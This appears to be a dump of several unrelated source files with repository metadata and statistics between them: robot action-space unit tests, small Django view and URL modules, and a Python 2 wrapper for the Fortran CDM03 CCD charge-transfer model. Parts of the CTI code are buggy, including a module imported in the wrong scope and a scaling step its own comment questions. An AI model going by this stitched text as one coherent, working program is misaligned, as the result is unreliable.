as_jp_full.denormalize_action(upper_101_normalized_action))
assert as_default.satisfy_constraints(lower_99_normalized_action)
assert not as_default.satisfy_constraints(lower_100_normalized_action)
assert not as_default.satisfy_constraints(lower_101_normalized_action)
assert as_jt_norm.satisfy_constraints(lower_99_normalized_action)
assert not as_jt_norm.satisfy_constraints(lower_100_normalized_action)
assert not as_jt_norm.satisfy_constraints(lower_101_normalized_action)
assert as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_99_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_100_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_101_normalized_action))
assert as_jp_norm.satisfy_constraints(lower_99_normalized_action)
assert not as_jp_norm.satisfy_constraints(lower_100_normalized_action)
assert not as_jp_norm.satisfy_constraints(lower_101_normalized_action)
assert as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_99_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_100_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_101_normalized_action))
def test_clip_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.clip_action(upper_99_normalized_action) ==
upper_99_normalized_action).all()
assert (as_default.clip_action(lower_99_normalized_action) ==
lower_99_normalized_action).all()
assert (as_default.clip_action(upper_100_normalized_action) ==
upper_100_normalized_action).all()
assert (as_default.clip_action(lower_100_normalized_action) ==
lower_100_normalized_action).all()
assert (as_default.clip_action(upper_101_normalized_action) ==
upper_100_normalized_action).all()
assert (as_default.clip_action(lower_101_normalized_action) ==
lower_100_normalized_action).all()
assert (as_default.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert (as_jt_norm.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert (as_jp_norm.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert as_jp_full.clip_action(
as_jp_full.denormalize_action(
normalized_action_to_be_clipped)) == pytest.approx(
as_jp_full.denormalize_action(normalized_action_clipped))
def test_normalize_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jp_full.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jp_norm.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jt_full.normalize_action(upper_100_denormalized_jt_action) ==
upper_100_normalized_action).all()
assert (as_jt_norm.normalize_action(upper_100_denormalized_jt_action) ==
upper_100_normalized_action).all()
assert (as_jt_full.normalize_action(upper_100_denormalized_jp_action) !=
upper_100_normalized_action).all()
assert (as_jt_norm.normalize_action(upper_100_denormalized_jp_action) !=
upper_100_normalized_action).all()
assert (as_jp_full.normalize_action(upper_100_denormalized_jt_action) !=
upper_100_normalized_action).all()
assert (as_jp_norm.normalize_action(upper_100_denormalized_jt_action) !=
upper_100_normalized_action).all()
assert (as_default.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jp_full.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jp_norm.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jt_full.normalize_action(lower_100_denormalized_jt_action) ==
lower_100_normalized_action).all()
assert (as_jt_norm.normalize_action(lower_100_denormalized_jt_action) ==
lower_100_normalized_action).all()
assert (as_jt_full.normalize_action(lower_100_denormalized_jp_action) !=
lower_100_normalized_action).all()
assert (as_jt_norm.normalize_action(lower_100_denormalized_jp_action) !=
lower_100_normalized_action).all()
assert (as_jp_full.normalize_action(lower_100_denormalized_jt_action) !=
lower_100_normalized_action).all()
assert (as_jp_norm.normalize_action(lower_100_denormalized_jt_action) !=
lower_100_normalized_action).all()
# convert back and forth
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(upper_100_denormalized_jp_action)
) == pytest.approx(upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(upper_100_denormalized_jt_action)
) == pytest.approx(upper_100_denormalized_jt_action)
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(lower_100_denormalized_jp_action)
) == pytest.approx(lower_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(lower_100_denormalized_jt_action)
) == pytest.approx(lower_100_denormalized_jt_action)
def test_denormalize_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jp_full.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jp_norm.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jt_action)
assert as_jt_full.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jt_action)
assert (as_jt_norm.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jp_action).all()
assert (as_jt_full.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jp_action).all()
assert (as_jp_full.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jt_action).all()
assert (as_jp_norm.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jt_action).all()
assert as_default.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jp_full.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jp_norm.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jt_full.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jt_action)
assert as_jt_norm.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jt_action)
assert (as_jt_full.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jp_action).all()
assert (as_jt_norm.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jp_action).all()
assert (as_jp_full.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jt_action).all()
assert (as_jp_norm.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jt_action).all()
# convert back and forth
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(upper_100_denormalized_jp_action)
) == pytest.approx(upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(upper_100_denormalized_jt_action)
) == pytest.approx(upper_100_denormalized_jt_action)
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(lower_100_denormalized_jp_action)
) == pytest.approx(lower_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(lower_100_denormalized_jt_action)
) == pytest.approx(lower_100_denormalized_jt_action)
| 45.730519
| 80
| 0.754207
| 1,927
| 14,085
| 4.981837
| 0.038921
| 0.156667
| 0.106875
| 0.058438
| 0.942292
| 0.918021
| 0.894583
| 0.871354
| 0.825625
| 0.724479
| 0
| 0.044279
| 0.16301
| 14,085
| 307
| 81
| 45.879479
| 0.77004
| 0.003195
| 0
| 0.466667
| 0
| 0
| 0.006554
| 0
| 0
| 0
| 0
| 0
| 0.403922
| 1
| 0.05098
| false
| 0
| 0.015686
| 0.023529
| 0.090196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f711418cc2a7272a44c634acc39dd49d66b1d4e
| 176
|
py
|
Python
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | 2
|
2021-05-06T16:05:38.000Z
|
2021-05-06T16:05:48.000Z
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | 1
|
2021-05-07T21:08:17.000Z
|
2021-05-07T21:08:17.000Z
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def hello_world(request):
    return render(request, 'hello_world.html', {})
| 25.142857
| 50
| 0.772727
| 24
| 176
| 5.583333
| 0.625
| 0.149254
| 0.283582
| 0.373134
| 0.462687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 176
| 7
| 50
| 25.142857
| 0.881579
| 0.130682
| 0
| 0.5
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
4f7f04601499488a80d2b3f655a42619b50dec85
| 166
|
py
|
Python
|
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from .urls import *
handler403 = 'misago.core.testproject.views.mock_custom_403_error_page'
handler404 = 'misago.core.testproject.views.mock_custom_404_error_page'
| 27.666667
| 71
| 0.831325
| 23
| 166
| 5.652174
| 0.652174
| 0.153846
| 0.323077
| 0.4
| 0.553846
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 0.072289
| 166
| 5
| 72
| 33.2
| 0.766234
| 0
| 0
| 0
| 0
| 0
| 0.674699
| 0.674699
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
96e6894513eda42fd7efaf4c875d6a9b00c89940
| 30,201
|
py
|
Python
|
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | 5
|
2016-12-13T16:58:53.000Z
|
2019-12-29T05:29:00.000Z
|
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | null | null | null |
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | 3
|
2015-07-13T10:01:41.000Z
|
2019-05-28T13:41:47.000Z
|
"""
Charge Transfer Inefficiency
============================
This file contains a simple class to run a CDM03 CTI model developed by Alex Short (ESA).
This now contains both the official CDM03 and a new version that allows different trap
parameters in parallel and serial direction.
:requires: NumPy
:requires: CDM03 (FORTRAN code, f2py -c -m cdm03bidir cdm03bidir.f90)
:author: Sami-Matias Niemi
:contact: s.niemi@ucl.ac.uk
:version: 0.35
"""
import numpy as np
try:
import cdm03bidir
#import cdm03bidirTest as cdm03bidir #for testing purposes only
except ImportError:
print 'No CDM03bidir module available, please compile it: f2py -c -m cdm03bidir cdm03bidir.f90'
#try:
# from numba import autojit
# from numba import jit
# from numba import double, int16
#except:
# print 'No numba available!'
class CDM03bidir():
"""
Class to run CDM03 CTI model, class Fortran routine to perform the actual CDM03 calculations.
:param settings: input parameters
:type settings: dict
:param data: input data to be radiated
:type data: ndarray
:param log: instance to Python logging
:type log: logging instance
"""
def __init__(self, settings, data, log=None):
"""
Class constructor.
:param settings: input parameters
:type settings: dict
:param data: input data to be radiated
:type data: ndarray
:param log: instance to Python logging
:type log: logging instance
"""
self.data = data
self.values = dict(quads=(0,1,2,3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
self.values.update(settings)
self.log = log
self._setupLogger()
#default CDM03 settings
self.params = dict(beta_p=0.6, beta_s=0.6, fwc=200000., vth=1.168e7, vg=6.e-11, t=20.48e-3,
sfwc=730000., svg=1.0e-10, st=5.0e-6, parallel=1., serial=1.)
#update with inputs
self.params.update(self.values)
#read in trap information
trapdata = np.loadtxt(self.values['parallelTrapfile'])
if trapdata.ndim > 1:
self.nt_p = trapdata[:, 0]
self.sigma_p = trapdata[:, 1]
self.taur_p = trapdata[:, 2]
else:
#only one trap species
self.nt_p = [trapdata[0],]
self.sigma_p = [trapdata[1],]
self.taur_p = [trapdata[2],]
trapdata = np.loadtxt(self.values['serialTrapfile'])
if trapdata.ndim > 1:
self.nt_s = trapdata[:, 0]
self.sigma_s = trapdata[:, 1]
self.taur_s = trapdata[:, 2]
else:
#only one trap species
self.nt_s = [trapdata[0],]
self.sigma_s = [trapdata[1],]
self.taur_s = [trapdata[2],]
#scale thibaut's values
if 'thibaut' in self.values['parallelTrapfile']:
self.nt_p /= 0.576 #thibaut's values traps / pixel
self.sigma_p *= 1.e4 #thibaut's values in m**2
if 'thibaut' in self.values['serialTrapfile']:
self.nt_s *= 0.576 #thibaut's values traps / pixel #should be division?
self.sigma_s *= 1.e4 #thibaut's values in m**2
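# --- Illustrative sketch, not part of the original class ---
# np.loadtxt returns a 1-D array when the trap file holds a single species and a
# 2-D array otherwise, which is why __init__ above checks ndim. np.atleast_2d
# collapses both cases into one code path:
import numpy as np

def load_traps_sketch(path):
    """Return the (nt, sigma, taur) columns for one or many trap species."""
    trapdata = np.atleast_2d(np.loadtxt(path))
    return trapdata[:, 0], trapdata[:, 1], trapdata[:, 2]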
def _setupLogger(self):
"""
Set up the logger.
"""
self.logger = True
if self.log is None:
self.logger = False
def radiateFullCCD(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problems with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.zeros((xdim, ydim))
#transpose the data, because Python has different convention than Fortran
data = self.data.transpose().copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
elif quad == 1:
d = data[self.values['xsize']:, :self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, :self.values['ysize']] = tmp
elif quad == 2:
d = data[:self.values['xsize'], self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['xsize'], self.values['ysize']:] = tmp
elif quad == 3:
d = data[self.values['xsize']:, self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, self.values['ysize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out.transpose()
def radiateFullCCD2(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problems with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.empty((ydim, xdim))
#no transpose here; the data are processed in Python's row-major convention
data = self.data.copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[:self.values['ysize'], :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], :self.values['xsize']] = tmp
elif quad == 1:
d = data[:self.values['ysize'], self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], self.values['xsize']:] = tmp
elif quad == 2:
d = data[self.values['ysize']:, :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, :self.values['xsize']] = tmp
elif quad == 3:
d = data[self.values['ysize']:, self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, self.values['xsize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out
def applyRadiationDamage(self, data, iquadrant=0):
"""
Apply radiation damage based on the FORTRAN CDM03 model. The method assumes that
input data covers only a single quadrant defined by the iquadrant integer.
:param data: imaging data to which the CDM03 model will be applied to.
:type data: ndarray
:param iquadrant: number of the quadrant to process
:type iquadrant: int
cdm03 - Function signature::
sout = cdm03(sinp,iflip,jflip,dob,rdose,in_nt,in_sigma,in_tr,[xdim,ydim,zdim])
Required arguments:
sinp : input rank-2 array('d') with bounds (xdim,ydim)
iflip : input int
jflip : input int
dob : input float
rdose : input float
in_nt : input rank-1 array('d') with bounds (zdim)
in_sigma : input rank-1 array('d') with bounds (zdim)
in_tr : input rank-1 array('d') with bounds (zdim)
Optional arguments:
xdim := shape(sinp,0) input int
ydim := shape(sinp,1) input int
zdim := len(in_nt) input int
Return objects:
sout : rank-2 array('d') with bounds (xdim,ydim)
.. Note:: Because Python/NumPy arrays are different row/column based, one needs
to be extra careful here. NumPy.asfortranarray will be called to get
an array laid out in Fortran order in memory. Before returning the
array will be laid out in memory in C-style (row-major order).
:return: image that has been run through the CDM03 model
:rtype: ndarray
"""""
iflip = iquadrant / 2
jflip = iquadrant % 2
params = [self.params['beta_p'], self.params['beta_s'], self.params['fwc'], self.params['vth'],
self.params['vg'], self.params['t'], self.params['sfwc'], self.params['svg'], self.params['st'],
self.params['parallel'], self.params['serial']]
if self.logger:
self.log.info('nt_p=' + str(self.nt_p))
self.log.info('nt_s=' + str(self.nt_s))
self.log.info('sigma_p= ' + str(self.sigma_p))
self.log.info('sigma_s= ' + str(self.sigma_s))
self.log.info('taur_p= ' + str(self.taur_p))
self.log.info('taur_s= ' + str(self.taur_s))
self.log.info('dob=%f' % self.values['dob'])
self.log.info('rdose=%e' % self.values['rdose'])
self.log.info('xsize=%i' % data.shape[1])
self.log.info('ysize=%i' % data.shape[0])
self.log.info('quadrant=%i' % iquadrant)
self.log.info('iflip=%i' % iflip)
self.log.info('jflip=%i' % jflip)
CTIed = cdm03bidir.cdm03(np.asfortranarray(data),
jflip, iflip,
self.values['dob'], self.values['rdose'],
self.nt_p, self.sigma_p, self.taur_p,
self.nt_s, self.sigma_s, self.taur_s,
params,
[data.shape[0], data.shape[1], len(self.nt_p), len(self.nt_s), len(self.params)])
return np.asanyarray(CTIed)
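# --- Illustrative sketch, not part of the original class ---
# applyRadiationDamage() derives two flip flags from the quadrant number before
# handing the (Fortran-ordered) array to cdm03. The index arithmetic alone, using
# // so it also behaves as intended under Python 3:
def quadrant_flips_sketch(iquadrant):
    """Return (iflip, jflip) for quadrants 0..3."""
    return iquadrant // 2, iquadrant % 2

# [quadrant_flips_sketch(q) for q in range(4)] -> [(0, 0), (0, 1), (1, 0), (1, 1)]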
class CDM03():
"""
Class to run CDM03 CTI model, class Fortran routine to perform the actual CDM03 calculations.
:param data: input data to be radiated
:type data: ndarray
:param input: input parameters
:type input: dictionary
:param log: instance to Python logging
:type log: logging instance
"""
def __init__(self, input, data, log=None):
"""
Class constructor.
:param data: input data to be radiated
:type data: ndarray
:param input: input parameters
:type input: dictionary
:param log: instance to Python logging
:type log: logging instance
"""
try:
import cdm03
except ImportError:
print 'No CDM03 module available, please compile it: f2py -c -m cdm03 cdm03.f90'
self.data = data
self.values = dict(quads=(0,1,2,3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
self.values.update(input)
self.log = log
self._setupLogger()
def _setupLogger(self):
"""
Set up the logger.
"""
self.logger = True
if self.log is None:
self.logger = False
def radiateFullCCD(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problems with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.zeros((xdim, ydim))
#transpose the data, because Python has different convention than Fortran
data = self.data.transpose().copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
elif quad == 1:
d = data[self.values['xsize']:, :self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, :self.values['ysize']] = tmp
elif quad == 2:
d = data[:self.values['xsize'], self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['xsize'], self.values['ysize']:] = tmp
elif quad == 3:
d = data[self.values['xsize']:, self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, self.values['ysize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out.transpose()
def radiateFullCCD2(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problems with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.empty((ydim, xdim))
#transpose the data, because Python has different convention than Fortran
data = self.data.copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[:self.values['ysize'], :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], :self.values['xsize']] = tmp
elif quad == 1:
d = data[:self.values['ysize'], self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], self.values['xsize']:] = tmp
elif quad == 2:
d = data[self.values['ysize']:, :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, :self.values['xsize']] = tmp
elif quad == 3:
d = data[self.values['ysize']:, self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, self.values['xsize']:] = tmp
else:
print('ERROR -- too many quadrants!!')
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out
def applyRadiationDamage(self, data, iquadrant=0):
"""
Apply radiation damage based on FORTRAN CDM03 model. The method assumes that
input data covers only a single quadrant defined by the iquadrant integer.
:param data: imaging data to which the CDM03 model will be applied to.
:type data: ndarray
:param iquadrant: number of the quadrant to process
:type iquadrant: int
cdm03 - Function signature::
sout = cdm03(sinp,iflip,jflip,dob,rdose,in_nt,in_sigma,in_tr,[xdim,ydim,zdim])
Required arguments:
sinp : input rank-2 array('d') with bounds (xdim,ydim)
iflip : input int
jflip : input int
dob : input float
rdose : input float
in_nt : input rank-1 array('d') with bounds (zdim)
in_sigma : input rank-1 array('d') with bounds (zdim)
in_tr : input rank-1 array('d') with bounds (zdim)
Optional arguments:
xdim := shape(sinp,0) input int
ydim := shape(sinp,1) input int
zdim := len(in_nt) input int
Return objects:
sout : rank-2 array('d') with bounds (xdim,ydim)
.. Note:: Because Python/NumPy arrays use a different row/column convention than
Fortran, one needs to be extra careful here. numpy.asfortranarray will be
called to get an array laid out in Fortran order in memory. Before returning,
the array will be laid out in memory in C-style (row-major) order.
:return: image that has been run through the CDM03 model
:rtype: ndarray
"""
#read in trap information
trapdata = np.loadtxt(self.values['trapfile'])
nt = trapdata[:, 0]
sigma = trapdata[:, 1]
taur = trapdata[:, 2]
iflip = iquadrant // 2
jflip = iquadrant % 2
if self.logger:
self.log.info('nt=' + str(nt))
self.log.info('sigma= ' + str(sigma))
self.log.info('taur= ' + str(taur))
self.log.info('dob=%f' % self.values['dob'])
self.log.info('rdose=%e' % self.values['rdose'])
self.log.info('xsize=%i' % data.shape[1])
self.log.info('ysize=%i' % data.shape[0])
self.log.info('quadrant=%i' % iquadrant)
self.log.info('iflip=%i' % iflip)
self.log.info('jflip=%i' % jflip)
#call Fortran routine
CTIed = cdm03.cdm03(np.asfortranarray(data),
iflip, jflip,
self.values['dob'], self.values['rdose'],
nt, sigma, taur)
return np.asanyarray(CTIed)
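# --- usage sketch (added for illustration; not part of the original module) ---
# A minimal, hedged example of driving the CDM03 class above. It assumes the
# compiled f2py module 'cdm03' is importable and that the trap file
# 'cdm_euclid_parallel.dat' (three columns: trap density, cross-section,
# release time) is present; both names come from this module but act as
# placeholders here. The blank image uses the class defaults of four
# 2048 x 2066 quadrants.
def _cdm03_usage_example():
    import logging
    log = logging.getLogger('cdm03demo')
    image = np.zeros((2 * 2066, 2 * 2048))            # full CCD, four quadrants
    settings = dict(trapfile='cdm_euclid_parallel.dat')
    cti = CDM03(settings, image, log=log)
    return cti.radiateFullCCD()                       # ndarray with CTI trails added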
# class CDM03Python():
# def __init__(self, input, data, log=None):
# """
# Class constructor.
#
# :param data: input data to be radiated
# :type data: ndarray
# :param input: input parameters
# :type input: dictionary
# :param log: instance to Python logging
# :type log: logging instance
# """
# self.data = data
# self.values = dict(quads=(0, 1, 2, 3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
# self.values.update(input)
# self.log = log
# self._setupLogger()
#
#
# def _setupLogger(self):
# """
# Set up the logger.
# """
# self.logger = True
# if self.log is None:
# self.logger = False
#
#
# def radiateFullCCD(self):
# """
# This routine allows the whole CCD to be run through a radiation damage mode.
# The routine takes into account the fact that the amplifiers are in the corners
# of the CCD. The routine assumes that the CCD is using four amplifiers.
#
# There is an excess of .copy() calls, which should probably be cleaned up. However,
# given that I had problem with the Fortran code, I have kept the calls. If memory
# becomes an issue then this should be cleaned.
#
# :return: radiation damaged image
# :rtype: ndarray
# """
# ydim, xdim = self.data.shape
# out = np.zeros((xdim, ydim))
#
# #transpose the data, because Python has different convention than Fortran
# data = self.data.transpose().copy()
#
# for quad in self.values['quads']:
# if self.logger:
# self.log.info('Adding CTI to Q%i' % quad)
#
# if quad == 0:
# d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
# elif quad == 1:
# d = data[self.values['xsize']:, :self.values['ysize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['xsize']:, :self.values['ysize']] = tmp
# elif quad == 2:
# d = data[:self.values['xsize'], self.values['ysize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['xsize'], self.values['ysize']:] = tmp
# elif quad == 3:
# d = data[self.values['xsize']:, self.values['ysize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['xsize']:, self.values['ysize']:] = tmp
# else:
# print 'ERROR -- too many quadrants!!'
# self.log.error('Too many quadrants! This method allows only four quadrants.')
#
# return out.transpose()
#
#
# def radiateFullCCD2(self):
# """
# This routine allows the whole CCD to be run through a radiation damage mode.
# The routine takes into account the fact that the amplifiers are in the corners
# of the CCD. The routine assumes that the CCD is using four amplifiers.
#
# There is an excess of .copy() calls, which should probably be cleaned up. However,
# given that I had problem with the Fortran code, I have kept the calls. If memory
# becomes an issue then this should be cleaned.
#
# :return: radiation damaged image
# :rtype: ndarray
# """
# ydim, xdim = self.data.shape
# out = np.empty((ydim, xdim))
#
# #transpose the data, because Python has different convention than Fortran
# data = self.data.copy()
#
# for quad in self.values['quads']:
# if self.logger:
# self.log.info('Adding CTI to Q%i' % quad)
#
# if quad == 0:
# d = data[:self.values['ysize'], :self.values['xsize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['ysize'], :self.values['xsize']] = tmp
# elif quad == 1:
# d = data[:self.values['ysize'], self.values['xsize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['ysize'], self.values['xsize']:] = tmp
# elif quad == 2:
# d = data[self.values['ysize']:, :self.values['xsize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
